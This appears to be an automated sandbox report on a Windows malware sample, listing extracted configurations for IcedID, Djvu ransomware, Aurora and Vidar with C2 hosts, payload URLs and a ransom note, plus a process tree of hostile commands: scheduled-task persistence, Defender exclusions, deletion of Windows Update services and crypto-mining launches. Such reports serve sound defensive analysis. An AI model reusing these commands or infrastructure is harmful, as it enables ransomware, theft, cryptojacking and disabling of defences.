Analysis

  • max time kernel
    94s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-01-2023 00:00

General

  • Target

    38805b6c5a03f5e441d82749a50d42e4ab6a03c4ff250d9b2a16d45c7d744cf4.exe

  • Size

    320KB

  • MD5

    7a806996e4de228c9b3e60b9de5c4640

  • SHA1

    8ba775b47660510c4ba37b45ef7407cec9f9cb46

  • SHA256

    38805b6c5a03f5e441d82749a50d42e4ab6a03c4ff250d9b2a16d45c7d744cf4

  • SHA512

    75bed73da09e734237d4c5f0efb60ab5809f938a53bacc7691c2d88e3419ee16b391b08cc843ea3ae022739b250c326bdf3ed4a91abca5867c533f4d664dd4e3

  • SSDEEP

    3072:8XORgoMvh5GBzn5S0QV/a1rQCiquL1Zels3oRuMTCkF8M/WhJshXiN3BKmZ+s:4YqSzdQ5+rJCL1ZeC3UuMGkO6WRN4g

Malware Config

Extracted

Family

icedid

Campaign

3131022508

C2

wagringamuk.com

Extracted

Family

djvu

C2

http://spaceris.com/lancer/get.php

Attributes
  • extension

    .zouu

  • offline_id

    7hl6KB3alcoZ6n4DhS2rApCezkIMzShntAiXWMt1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://spaceris.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-N3pXlaPXFm Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0631JOsie

rsa_pubkey.plain

Extracted

Family

aurora

C2

82.115.223.77:8081

Extracted

Family

vidar

Version

2

Botnet

19

C2

https://t.me/tgdatapacks

https://steamcommunity.com/profiles/76561199469677637

Attributes
  • profile_id

    19

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • DcRat 5 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 10 IoCs
  • Detects Smokeloader packer 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detectes Phoenix Miner Payload 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 19 IoCs
  • Stops running service(s) 3 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Uses the VBS compiler for execution 1 TTPs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 26 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38805b6c5a03f5e441d82749a50d42e4ab6a03c4ff250d9b2a16d45c7d744cf4.exe
    "C:\Users\Admin\AppData\Local\Temp\38805b6c5a03f5e441d82749a50d42e4ab6a03c4ff250d9b2a16d45c7d744cf4.exe"
    1⤵
    • DcRat
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4596
  • C:\Users\Admin\AppData\Local\Temp\B9B0.exe
    C:\Users\Admin\AppData\Local\Temp\B9B0.exe
    1⤵
    • Executes dropped EXE
    PID:340
  • C:\Users\Admin\AppData\Local\Temp\BADA.exe
    C:\Users\Admin\AppData\Local\Temp\BADA.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3756
    • C:\Users\Admin\AppData\Local\Temp\BADA.exe
      C:\Users\Admin\AppData\Local\Temp\BADA.exe
      2⤵
      • DcRat
      • Executes dropped EXE
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\0d4199ad-8d68-4810-8789-37b64fa346ec" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:2772
      • C:\Users\Admin\AppData\Local\Temp\BADA.exe
        "C:\Users\Admin\AppData\Local\Temp\BADA.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2532
        • C:\Users\Admin\AppData\Local\Temp\BADA.exe
          "C:\Users\Admin\AppData\Local\Temp\BADA.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4136
          • C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build2.exe
            "C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:2752
            • C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build2.exe
              "C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build2.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Checks processor information in registry
              PID:1708
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build2.exe" & exit
                7⤵
                  PID:4448
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1656
            • C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build3.exe
              "C:\Users\Admin\AppData\Local\677ef954-5f88-422b-9a24-4a3e47ba6d2e\build3.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4824
              • C:\Windows\SysWOW64\schtasks.exe
                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                6⤵
                • DcRat
                • Creates scheduled task(s)
                PID:812
    • C:\Users\Admin\AppData\Local\Temp\C1A1.exe
      C:\Users\Admin\AppData\Local\Temp\C1A1.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3672
    • C:\Users\Admin\AppData\Local\Temp\C348.exe
      C:\Users\Admin\AppData\Local\Temp\C348.exe
      1⤵
      • Executes dropped EXE
      PID:3616
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3616 -s 348
        2⤵
        • Program crash
        PID:1088
    • C:\Users\Admin\AppData\Local\Temp\C944.exe
      C:\Users\Admin\AppData\Local\Temp\C944.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3532
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3396
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic os get Caption
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1152
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic path win32_VideoController get name"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3204
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3952
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic cpu get name"
          3⤵
            PID:2908
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              wmic cpu get name
              4⤵
                PID:4220
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "" "start-process C:\Users\Admin\AppData\Local\Temp\Z93L5dm3Fk.exe"
              3⤵
                PID:3408
                • C:\Users\Admin\AppData\Local\Temp\Z93L5dm3Fk.exe
                  "C:\Users\Admin\AppData\Local\Temp\Z93L5dm3Fk.exe"
                  4⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:5100
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 264
              2⤵
              • Program crash
              PID:1704
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3616 -ip 3616
            1⤵
              PID:2092
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3532 -ip 3532
              1⤵
                PID:4112
              • C:\Users\Admin\AppData\Local\Temp\4991.exe
                C:\Users\Admin\AppData\Local\Temp\4991.exe
                1⤵
                • Executes dropped EXE
                PID:2640
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\Qytyaworpiotpd.tmp",Edoqqdswdffqipe
                  2⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:3036
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 23783
                    3⤵
                      PID:2708
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                      3⤵
                        PID:3992
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                        3⤵
                          PID:4992
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 532
                        2⤵
                        • Program crash
                        PID:4424
                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                      1⤵
                      • Executes dropped EXE
                      PID:2120
                      • C:\Windows\SysWOW64\schtasks.exe
                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                        2⤵
                        • DcRat
                        • Creates scheduled task(s)
                        PID:4528
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2640 -ip 2640
                      1⤵
                        PID:3148
                      • C:\Users\Admin\AppData\Local\Temp\9541.exe
                        C:\Users\Admin\AppData\Local\Temp\9541.exe
                        1⤵
                        • Executes dropped EXE
                        PID:3616
                      • C:\Users\Admin\AppData\Local\Temp\A436.exe
                        C:\Users\Admin\AppData\Local\Temp\A436.exe
                        1⤵
                        • Executes dropped EXE
                        PID:1616
                      • C:\Users\Admin\AppData\Local\Temp\A764.exe
                        C:\Users\Admin\AppData\Local\Temp\A764.exe
                        1⤵
                        • Executes dropped EXE
                        PID:2532
                      • C:\Users\Admin\AppData\Local\Temp\B4C2.exe
                        C:\Users\Admin\AppData\Local\Temp\B4C2.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks computer location settings
                        • Checks whether UAC is enabled
                        PID:4884
                        • C:\Users\Admin\AppData\Local\Temp\vbc.exe
                          "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                          2⤵
                          • Executes dropped EXE
                          PID:4600
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC340.tmp.bat""
                            3⤵
                              PID:3800
                              • C:\Windows\system32\timeout.exe
                                timeout 3
                                4⤵
                                • Delays execution with timeout.exe
                                PID:4164
                              • C:\ProgramData\Driver\OLPFE.exe
                                "C:\ProgramData\Driver\OLPFE.exe"
                                4⤵
                                  PID:1836
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OLPFE" /tr "C:\ProgramData\Driver\OLPFE.exe"
                                    5⤵
                                      PID:996
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OLPFE" /tr "C:\ProgramData\Driver\OLPFE.exe"
                                        6⤵
                                        • DcRat
                                        • Creates scheduled task(s)
                                        PID:920
                                    • C:\Users\Admin\AppData\Roaming\program.exe
                                      "C:\Users\Admin\AppData\Roaming\program.exe"
                                      5⤵
                                        PID:4232
                                        • C:\Users\Admin\AppData\Roaming\program.exe
                                          "C:\Users\Admin\AppData\Roaming\program.exe"
                                          6⤵
                                            PID:2140
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler C:\Users\Admin\AppData\Local\Temp\1.exe
                                              7⤵
                                                PID:1652
                                                • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                  8⤵
                                                    PID:3508
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe --coin=XMR -o xmr.2miners.com:2222 -u 8BbMarAQor3Kzgyv54LZbdZNqeLWzSr9jd8VTd6b3BB1Zxco15RHh6eQ6ZgUQUhS5NZyY6wnLzjUeQupx4vtAVZh1W8ffFf.gle321 -p x --max-cpu-usage=80 --donate-level=1 -opencl
                                              5⤵
                                                PID:4820
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe --algo ETCHASH --pool etc.2miners.com:1010 --user 0xa7173397b7ed98fc3316a0645d13a0c654921dd8.abu
                                                5⤵
                                                  PID:5092
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:3548
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                              PID:812
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              1⤵
                                                PID:3952
                                              • C:\Windows\explorer.exe
                                                C:\Windows\explorer.exe
                                                1⤵
                                                  PID:3928
                                                • C:\Windows\SysWOW64\explorer.exe
                                                  C:\Windows\SysWOW64\explorer.exe
                                                  1⤵
                                                    PID:624
                                                  • C:\Windows\SysWOW64\explorer.exe
                                                    C:\Windows\SysWOW64\explorer.exe
                                                    1⤵
                                                      PID:2784
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      C:\Windows\SysWOW64\explorer.exe
                                                      1⤵
                                                        PID:3856
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe
                                                        1⤵
                                                          PID:4880
                                                        • C:\Windows\SysWOW64\explorer.exe
                                                          C:\Windows\SysWOW64\explorer.exe
                                                          1⤵
                                                            PID:1924
                                                          • C:\Windows\System32\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            1⤵
                                                              PID:3240
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                              1⤵
                                                                PID:2180
                                                              • C:\Windows\System32\cmd.exe
                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                1⤵
                                                                  PID:4188
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop UsoSvc
                                                                    2⤵
                                                                    • Launches sc.exe
                                                                    PID:3616
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop WaaSMedicSvc
                                                                    2⤵
                                                                    • Launches sc.exe
                                                                    PID:1616
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop wuauserv
                                                                    2⤵
                                                                    • Launches sc.exe
                                                                    PID:1824
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop bits
                                                                    2⤵
                                                                    • Launches sc.exe
                                                                    PID:4816
                                                                  • C:\Windows\System32\sc.exe
                                                                    sc stop dosvc
                                                                    2⤵
                                                                    • Launches sc.exe
                                                                    PID:4724
                                                                  • C:\Windows\System32\reg.exe
                                                                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                    2⤵
                                                                      PID:3020
                                                                    • C:\Windows\System32\reg.exe
                                                                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                      2⤵
                                                                        PID:3592
                                                                      • C:\Windows\System32\reg.exe
                                                                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                        2⤵
                                                                          PID:4684
                                                                        • C:\Windows\System32\reg.exe
                                                                          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                          2⤵
                                                                            PID:1524
                                                                          • C:\Windows\System32\reg.exe
                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                            2⤵
                                                                              PID:3460
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yxmejq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsAutHost' /tr '''C:\Program Files\WindowsServices\WindowsAutHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsServices\WindowsAutHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsAutHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsAutHost" /t REG_SZ /f /d 'C:\Program Files\WindowsServices\WindowsAutHost' }
                                                                            1⤵
                                                                              PID:5072
                                                                            • C:\Windows\System32\cmd.exe
                                                                              C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                              1⤵
                                                                                PID:2780
                                                                                • C:\Windows\System32\powercfg.exe
                                                                                  powercfg /x -hibernate-timeout-ac 0
                                                                                  2⤵
                                                                                    PID:2100
                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                    powercfg /x -hibernate-timeout-dc 0
                                                                                    2⤵
                                                                                      PID:1628
                                                                                    • C:\Windows\System32\powercfg.exe
                                                                                      powercfg /x -standby-timeout-ac 0
                                                                                      2⤵
                                                                                        PID:2756
                                                                                      • C:\Windows\System32\powercfg.exe
                                                                                        powercfg /x -standby-timeout-dc 0
                                                                                        2⤵
                                                                                          PID:4144
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                        1⤵
                                                                                          PID:1632
                                                                                          • C:\Windows\System32\choice.exe
                                                                                            choice /C Y /N /D Y /T 3
                                                                                            2⤵
                                                                                              PID:4220
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#enlkvlex#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsAutHost" } Else { "C:\Program Files\WindowsServices\WindowsAutHost" }
                                                                                            1⤵
                                                                                              PID:1704
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                "C:\Windows\system32\schtasks.exe" /run /tn WindowsAutHost
                                                                                                2⤵
                                                                                                  PID:2172
                                                                                              • C:\Program Files\WindowsServices\WindowsAutHost
                                                                                                "C:\Program Files\WindowsServices\WindowsAutHost"
                                                                                                1⤵
                                                                                                  PID:2252

                                                                                                Network

                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                Execution

                                                                                                Scripting

                                                                                                1
                                                                                                T1064

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Persistence

                                                                                                Modify Existing Service

                                                                                                1
                                                                                                T1031

                                                                                                Registry Run Keys / Startup Folder

                                                                                                1
                                                                                                T1060

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Privilege Escalation

                                                                                                Scheduled Task

                                                                                                1
                                                                                                T1053

                                                                                                Defense Evasion

                                                                                                Virtualization/Sandbox Evasion

                                                                                                1
                                                                                                T1497

                                                                                                Impair Defenses

                                                                                                1
                                                                                                T1562

                                                                                                File Permissions Modification

                                                                                                1
                                                                                                T1222

                                                                                                Scripting

                                                                                                1
                                                                                                T1064

                                                                                                Modify Registry

                                                                                                1
                                                                                                T1112

                                                                                                Credential Access

                                                                                                Credentials in Files

                                                                                                3
                                                                                                T1081

                                                                                                Discovery

                                                                                                Query Registry

                                                                                                6
                                                                                                T1012

                                                                                                Virtualization/Sandbox Evasion

                                                                                                1
                                                                                                T1497

                                                                                                System Information Discovery

                                                                                                6
                                                                                                T1082

                                                                                                Peripheral Device Discovery

                                                                                                1
                                                                                                T1120

                                                                                                Collection

                                                                                                Data from Local System

                                                                                                3
                                                                                                T1005

                                                                                                Impact

                                                                                                Service Stop

                                                                                                1
                                                                                                T1489

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Program Files\WindowsServices\WindowsAutHost
                                                                                                  Filesize

                                                                                                  9.4MB

                                                                                                  MD5

                                                                                                  9be61ff460b822df2c3968c6511017b5

                                                                                                  SHA1

                                                                                                  14bd79daf9ebaed0aed625b956f23e21a40c111a

                                                                                                  SHA256

                                                                                                  1519b935a98cfba1ac0ab5dcc06efcadff202fd8577be0e2c6e1e92516751950

                                                                                                  SHA512

                                                                                                  a625effcf35244997bdd8606b19e30e7172783b54c4a06387b25120a85b394914ae162a8e120950342e886abf7ecd6e7319728acaeea919b7570b9caf408f1dd

                                                                                                • C:\Program Files\WindowsServices\WindowsAutHost
                                                                                                  Filesize

                                                                                                  9.4MB

                                                                                                  MD5

                                                                                                  9be61ff460b822df2c3968c6511017b5

                                                                                                  SHA1

                                                                                                  14bd79daf9ebaed0aed625b956f23e21a40c111a

                                                                                                  SHA256

                                                                                                  1519b935a98cfba1ac0ab5dcc06efcadff202fd8577be0e2c6e1e92516751950

                                                                                                  SHA512

                                                                                                  a625effcf35244997bdd8606b19e30e7172783b54c4a06387b25120a85b394914ae162a8e120950342e886abf7ecd6e7319728acaeea919b7570b9caf408f1dd

                                                                                                • C:\ProgramData\Driver\OLPFE.exe
                                                                                                  Filesize

                                                                                                  919KB

                                                                                                  MD5

                                                                                                  bd5a17eb1ed5bf5bc4f7f08ad9766737

                                                                                                  SHA1

                                                                                                  480b575e139703cdb4502d50fe9baf43423c135b

                                                                                                  SHA256

                                                                                                  a11bedbc3055b4aeab790ed2911a093bddca71c81b13f4ead0e1dcbb4e1b075a

                                                                                                  SHA512

                                                                                                  3262547462d78562f6a86bbf0296cb7bfae8c08bb00cfe0f6d4e3572fae6b3e124d7879794242d4b66fd0704c0a6afb4e24264bbec65c39d1778f052721b35d1

                                                                                                • C:\ProgramData\Driver\OLPFE.exe
                                                                                                  Filesize

                                                                                                  919KB

                                                                                                  MD5

                                                                                                  bd5a17eb1ed5bf5bc4f7f08ad9766737

                                                                                                  SHA1

                                                                                                  480b575e139703cdb4502d50fe9baf43423c135b

                                                                                                  SHA256

                                                                                                  a11bedbc3055b4aeab790ed2911a093bddca71c81b13f4ead0e1dcbb4e1b075a

                                                                                                  SHA512

                                                                                                  3262547462d78562f6a86bbf0296cb7bfae8c08bb00cfe0f6d4e3572fae6b3e124d7879794242d4b66fd0704c0a6afb4e24264bbec65c39d1778f052721b35d1

                                                                                                • C:\ProgramData\mozglue.dll
                                                                                                  Filesize

                                                                                                  133KB

                                                                                                  MD5

                                                                                                  8f73c08a9660691143661bf7332c3c27

                                                                                                  SHA1

                                                                                                  37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                                  SHA256

                                                                                                  3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                                  SHA512

                                                                                                  0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                                • C:\ProgramData\nss3.dll
                                                                                                  Filesize

                                                                                                  1.2MB

                                                                                                  MD5

                                                                                                  bfac4e3c5908856ba17d41edcd455a51

                                                                                                  SHA1

                                                                                                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                                                  SHA256

                                                                                                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                                                  SHA512

                                                                                                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                  Filesize

                                                                                                  2KB

                                                                                                  MD5

                                                                                                  61a9f01083346a0ee40dc68983932b14

                                                                                                  SHA1

                                                                                                  85737a00e510acc709a5ea03d04a666bf41eb912

                                                                                                  SHA256

                                                                                                  db745e7939f305e69baa8e6fda50687f545b5b9af3cffbd290f1223d7956c1e7

                                                                                                  SHA512

                                                                                                  80edf82ede77a5657e92ca9c6ec45fe28118f1f0372d33e377185f7043580ee136927922556795552b41b9bd03aaef9a0273758af375b56ad4470aa23ac88349

                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  deb5907196e6e5e0e915c276f65a6924

                                                                                                  SHA1

